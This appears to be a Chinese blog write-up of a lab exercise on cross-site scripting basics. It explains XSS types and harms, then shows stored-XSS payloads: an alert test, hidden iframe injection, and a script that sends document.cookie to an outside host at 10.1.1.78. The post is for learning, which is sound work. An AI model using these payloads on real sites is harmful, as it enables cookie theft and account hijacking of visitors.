合天-web安全-xss-跨站脚本攻击基础

xss简介:
1)跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。

2)XSS工作原理

  恶意web用户将代码植入到提供给其它用户使用的页面中,如果程序没有经过过滤或者过滤敏感字符不严密就直接输出或者写入数据库。合法用户在访问这些页面的时候,程序将数据库里面的信息输出,这些恶意代码就会被执行。

3)XSS漏洞的分类

  1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身;

  2.反射式漏洞,这种漏洞和类型A有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中;

  3.存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。
4)XSS攻击的危害

      1.盗取用户cookie;

      2.盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号;

      3.控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力;

      4.盗窃企业重要的具有商业价值的资料;

      5.强制发送电子邮件;

      6.网站挂马;

跨站脚本攻击基础

(这道题主要学习了网页种马的知识)
在这里插入图片描述
直接在留言版发现了存在的xss漏洞,这是存储型的xss
代码:<script>alert(1)</script>

二、网页种马

<iframe src="http://www.heetian.com"></iframe>

效果图如下
在这里插入图片描述
可以隐藏网页

<iframe src=http://www.baidu.com width="0" height="0"></iframe>

在这里插入图片描述

三、获取cookie

<script>document.write(document.cookie)</script>

如若要完成cookie的传输
代码如下

<script>document.write("<iframe width=0 height=0 src='http://10.1.1.78/cookie.asp?cookie="+document.cookie+"'></iframe>");</script>

要在网页端建立 接收的代码。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值